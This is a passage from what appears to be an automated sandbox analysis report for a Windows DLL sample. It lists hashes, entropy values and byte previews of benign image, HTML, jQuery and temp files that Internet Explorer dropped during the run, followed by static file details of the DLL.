SHA-256:	878BD9D235D9E85EC0E1A57ABDEB938495FBDF8D8FA534A0E6C1835D78BC713F
SHA-512:	554703B928AA1A7A9B307D4D1C982241DB4B6B0E2F408E56D36921A21581D416D93090951DEA9745CC163388B24570C741126A401CFED8E76BBA80FFC34FD855
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..7b.......!.....P.34.(.B..N.a..\d...c5m...h...NG.@...P...J.:S...LW...qR.n.......x..4.P...@...^.........h.o..h.....9@>..b..<G..w...K.@v..p.U..S.!..<@....~".!k;f..>.@@.dg.[.@..O.C...q@.C..vG.,.z7"....W.1q.?....*..\|Un./..w.ir..Km{L.;\|.R{?..ar.Ky.....@.B..R..0......#@..G......,...?........c.....P...?:.p.z.h...o.a..,@mc.a/...lR.....:H?..?...$.G.-.?......<.......z,..K!^UI=OJ@=$f.hd

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAQYULr[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	15081
Entropy (8bit):	7.927000529392556
Encrypted:	false
SSDEEP:	192:Q2YieBOy7JVvGCT+6qjts0SvtL9pduhgn6DW2pzJBLR3puz1tm+R2DYETmJ2BkTc:N14vlVvGQqjiPtLnVn6DbQzJRpctkzPU
MD5:	985B1868C277EB8E85D1F7B4091E5208
SHA1:	A5DAFF826FBA9DA1E82449FBA9525E8FED1403D4
SHA-256:	B226C1C7D78988AD3704A3D33C7B925E4B4E6484FC047ED7B1CB41E0D92164F0
SHA-512:	E690DEDD645409BC1B7C3E7EAF2B7BBE91DF1ABDA500EFA94F4600323BE8AEE9018149E90D4FF006F686A5851600CA41CC340E707B9C4C32ABE349E20219BBCE
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....@.4.......;.}...5.6bZ30`.$.=..l........S]Ks}.b.v...t....dr..'M....C"..qes .SF@..JS%..q...k.l`.......F.!..s....`....t...lk.b.......=dV.l.N.sY.f.ldx.m.B1...nMg..xt`8...M=....P..&[.......BM.F...v...0.A...D.FM.....kH..R]I.P....^.q.`..3U.......:Q'f...mV...E)4.h...Xi.*..C1(.(...@.@..3)...0..&..R.JR..r...\\1B.=k...2.......>d.Fj...U.$Tu-$(E._.Xx$....d..?..d1..m4.%.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1aXBV1[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.80841974432226
Encrypted:	false
SSDEEP:	24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
MD5:	D858BE67BEA11BF5CEC1B2A6C1C1F395
SHA1:	6090B195BEF6AF1157654048EECEA81E2DCEC42A
SHA-256:	FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
SHA-512:	180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................U....pHYs..........+.....;IDATx...}..c.....j...2..Y.l....i.<4.c...)..p...M..(4b.Z.r...."cDe..Bz..sw.g.9.....^..u}?....n[he.{..,u.....`.>.[.iE...[.1B.Tx..X.7......0.[.....5.)p...x...d\...g..........WmE1.sl......u....3K.[......;...........f....W(.E3//6...2tG..AU...`7f.m. r;..r..{.~.X./.Q._..`.C...D.M.n.p%..U...0...HTe..1......7.@.Tn.r......C.k.../[..j.X..:.+Q.3.y.4. ,E....g.Y...p^..c..:..#/...iES....E.w..op.... .9.W........).+.1....A~.\...{...q.El..`.&;...o.&q:.K....\|.....e.(..."9.z\.~.....G.h...\.'.;... G........J....P.gy..<BeK.I..<..d..MF".O.uE...R..-...{..J...F..*.a..lj...t\.W.....&.l\|?...WvP...._o.c.....8..10;.q-"8L.2..~,....~V..\|]..c..\.'...I.....u8.......Q.3..lB."..!LD.bs.K[..)0P0.9..'....K...W..g..,f.........S......S..)N..D;.....<.....7#..X2.ws.....H.vF'...,$l..R4.O/.~..j.'&..6.........!.D.m..].G........W#.Uir..sT..m....h...UN.._V#..S.6.....i..M....[..?.J.....OL\..Q<{.G.n5).Ix.....<+7Ey.....W.].NR.o...._.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1cEP3G[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1088
Entropy (8bit):	7.81915680849984
Encrypted:	false
SSDEEP:	24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
MD5:	24F1589A12D948B741C2E5A0C4F19C2A
SHA1:	DC9BB00C5D063F25216CDABB77F5F01EA9F88325
SHA-256:	619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
SHA-512:	5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.\|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1cG73h[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1131
Entropy (8bit):	7.767634475904567
Encrypted:	false
SSDEEP:	24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
MD5:	D1495662336B0F1575134D32AF5D670A
SHA1:	EF841C80BB68056D4EF872C3815B33F147CA31A8
SHA-256:	8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
SHA-512:	964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x\|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.......<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue........?A...v..0...aS.:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C\|{.\|r.$.=Y.#5.K6.!........d.G...{......$.-D.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....\|K..T....vd....cH.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1fdtSt[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	modified
Size (bytes):	438
Entropy (8bit):	7.245257101036661
Encrypted:	false
SSDEEP:	12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
MD5:	3F46112E8E54A82D0D7F8883CF12A86F
SHA1:	AA1A3340F167A655D0A0A087D0F6CBF98026296C
SHA-256:	E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
SHA-512:	EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+.....hIDATx...O+DQ../]....f..(,.,-.!.L..X..ee.,.. .I.D..h..P,&.\|.c.L.i.E.{.k..~.}.}........t...W....5.2..0)X0I.c.wbU.....N..,....-F...J#lSq.;....a........D .w.g..N.....F)l..........`_..s..A;?.4..+..ob......Qh.H.:A......(....;.z./..?.:...t.[.e..b.......{..t.A....M..0.>8&_"... Ev.Z`.."...=/..F.}X....#\|.Ny. Z......W...{HX;..F..w..M:...?W.<4B..!.I.....l.o...s....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1kc8s[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.702979580339968
Encrypted:	false
SSDEEP:	24:5yrGVrpvzYKWJzgT7w2CGZi1/BwIBCHL/P:srG1pLYPJzY7w/G4OIKLH
MD5:	CD8DFD7D16B4BA3E2873EE06DB780B06
SHA1:	E8A79F0671D287E116C76FAA5F0E8A4099E0BD23
SHA-256:	88E6642487D0F944C6A020133CAE030781CFDCB518802419F10AD78937BDA6DF
SHA-512:	199AA29EF33317A43D1C6DF434DD5F9D0FF54BF363CCB1948A970C7EC6889B083565E85E0A140FCDFC38B675CA3EB24DEA0659897EF0450CEF43444E1CEFDA8B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............;0......pHYs..........+...../IDATx..]H.Q......LG.LW..Ha..:?.f_l...l.a..........z.a.e.=)....D...'c.E_...F.&).\...4....x...:...=..g.?.....>...'......b......I=..Z...V.o.....O........i4............9qjpWWW.P(\|.TM....}@0 ......Es .x...}.n..J.?....C(...V.UY[[.`........R.v..wvv........g.....v...H.....x......4.0..b.\v:.v\kN^'.`.....gb..y....FX,.y.J..............~.s..x<?.+...l6qYY..hT...A^^.....#.H....q}.^..r.o....WWW?....S.)...D..)..Qz.`0..f..T.t.VVV`ss.0:PQQ.MMM....p8...........`......H..#'=......o.H$.......L&.,?..x.....(%.....c}.0DPPP@.3........t....=Xb.r.`aa......dr.E..u....6,.j-c;11......p8..(.LJ.d2..n..BaL...(..6.-...e..Z?.<...M...5hmm...\|..................`4.qjj....d$..CsQtLUUU.%.....N....Wn~~.:...=.........(===..$Z.......h4....$.c.q.LM...xgffl...r.O.........}....(.Y.{{{.+.2.M..8.P..89"g6...B.l..Z.....o.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB6Ma4a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	368
Entropy (8bit):	6.811857078347448
Encrypted:	false
SSDEEP:	6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
MD5:	C144BE9E6D1FA9A7DB6BD090D23F3453
SHA1:	203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
SHA-256:	FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
SHA-512:	67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+....."IDATx.cy. ..?...\|.UA....GX...43.!:.o(f..Oa`..C...+Z0.y......~..0...>.....(....X3H.....Y....zQ4.s0....R.u.t..\|....)....(.$.`..a...d.qd.....3...W_...}....;.........4.....>....N....)d........p.4......`i.k@QE....j....B....X.7....\|..0.....pu?.1B,...J..P.......`F.>R..2.l.(..3J#.L4...9[...N....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB7gRE[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	501
Entropy (8bit):	7.3374462687222906
Encrypted:	false
SSDEEP:	12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
MD5:	1FCA95AEED29D3219D0A53A78A041312
SHA1:	5A4661CCF1E9F6581F71FC429E599D81B8895297
SHA-256:	4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
SHA-512:	7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..RKN.A.}... ...e1(."le.....F\...@.."...\|... ..ld.$.(.`..V.0].ghK....]SS...J.I.<@.O.{..........:WB8~....}Hr...P.....`l.N...N.....Z...'.3..;....3.B-....i...L........b..{... ..Q.... ........L...=.d....n.....&.!..O....W1..."....gm5x....[.C.9^Q.BC.....O...../.(...\|.~.0hv..S..7.....YBn..B..o.T<.........\|.g&....U.....gm.. .....U..,.u..)\$.lN.w]Rm.......OZ.h.......zn.~...A.uy........,..........3(..........z<....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	dropped
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
Reputation:	unknown
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	879
Entropy (8bit):	7.684764008510229
Encrypted:	false
SSDEEP:	24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
MD5:	4AAAEC9CA6F651BE6C54B005E92EA928
SHA1:	7296EC91AC01A8C127CD5B032A26BBC0B64E1451
SHA-256:	90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
SHA-512:	09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u......,I"...)...z............>.OVObQ......d?\|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x\|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......\|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..\|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...\|X..."!..'/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...Kq..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	424794
Entropy (8bit):	5.43860893398185
Encrypted:	false
SSDEEP:	3072:efQJUuxx+yAkJ8XRGDQZXhOxxs1scZ1DLCHPgWrfN8gk5fCE61Vxf7hLZ:efQhOyY19Z1GPgqfzk5fCEa/7j
MD5:	7AB324AC6E57110F1368460350F790DE
SHA1:	DD4417809075CE60C36A1EA461A09D1C0848CD43
SHA-256:	A5D1983062443ED0BB3BEAE7A6F04C70ABD8A93205A6E2327A32F4E877DA1A87
SHA-512:	F765DE3F7FD19A011053C910AE9C55656BDBF61A74503EA32FDF40C07CC99968617B74C5FDC449B9EBC9B6A234A703ADB0164F80679549FAE142D5DAC9C2622B
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20211114_25718401;a:19e6d720-9765-4be2-88a3-5942123825c1;cn:38;az:{did:2be360ae5c6345da911d978376c0449f, rid: 38, sn: neurope-prod-hp, dt: 2021-11-22T07:11:43.8081655Z, bt: 2021-11-14T01:17:13.2620239Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-11-22 13:26:14Z;axd:;f:msnallexpusers,muidflt15cf,muidflt18cf,muidflt27cf,muidflt46cf,muidflt301cf,moneyedge1cf,moneyedge3cf,pnehp3cf,article1cf,gallery1cf,onetrustpoplive,msnapp3cf,msnapp4cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,sagehz1cf,weather3cf,csmoney3cf,csmoney4cf,6bc60644,1s-br30min,btrecrow1,1s-winauthservice,1s-winsegservice,msnapp7cf,prong2c,1s-pagesegservice,routentpring2c;userOptOut:false;userOptOutOptions:" data-js="{"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Temp\~DF511C5929B225C7AA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	176128
Entropy (8bit):	3.3289823458732637
Encrypted:	false
SSDEEP:	3072:3Z/2Bfcdmu5kgTzGtXZ/2Bfc+mu5kgTzGt:+k
MD5:	1808C8A8997DDE114F47FE40F87F0888
SHA1:	3AB5D6B59E6E59700F99CC4B3CBD9FC3462A460B
SHA-256:	12F6CF79B3062FA9C505AB598D91DC24624CB035D57DB4D92BBD1082D2ABF38C
SHA-512:	C6404BE40D9A592FA47372AC22EC49FBEC7BC20385CCE07CF2A6053D8FE9F58B802197AF73DF471A9F821CFA47202485990702E82BBDACA9B87D6D8915C374DE
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7F454687EFA0D2F9.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08125376472238707
Encrypted:	false
SSDEEP:	3:fO2ClgVEdJO2BQB63o/lclllv/nt+lybltll1lRslkhlEkll8O25ysJMO2wl:fpmQEbpmBxUFAlkxEp5ybp
MD5:	A760813DD58646DD344F05469A47530A
SHA1:	1750CBD1429D4491ADC0F197BEC776A674676EAE
SHA-256:	75259CD61B8B666BD108EF2B38A2A3377CDAC7496D0A93EA11B678E7DE877A2D
SHA-512:	97F0A3428F04A8E86B2846A28164C40EDFA84446EF84F62A44ABF1079A3683240AF997A742517C92F7ADC62DE61893DCE2E1A9DBEBBD86249BF499712CDC7FEC
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.740903298361049
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Clipper DOS Executable (2020/12) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2W6FcgEeMy.dll
File size:	142336
MD5:	7dc420886e9c1a1e40e34d73ed2faf7c
SHA1:	1cf57d47fab52815150a8236e985e7976aba4f75
SHA256:	4e7f81fa970f3c2ffa70c22d10b2c81efbf7429594719be49b56a0b516503e4b
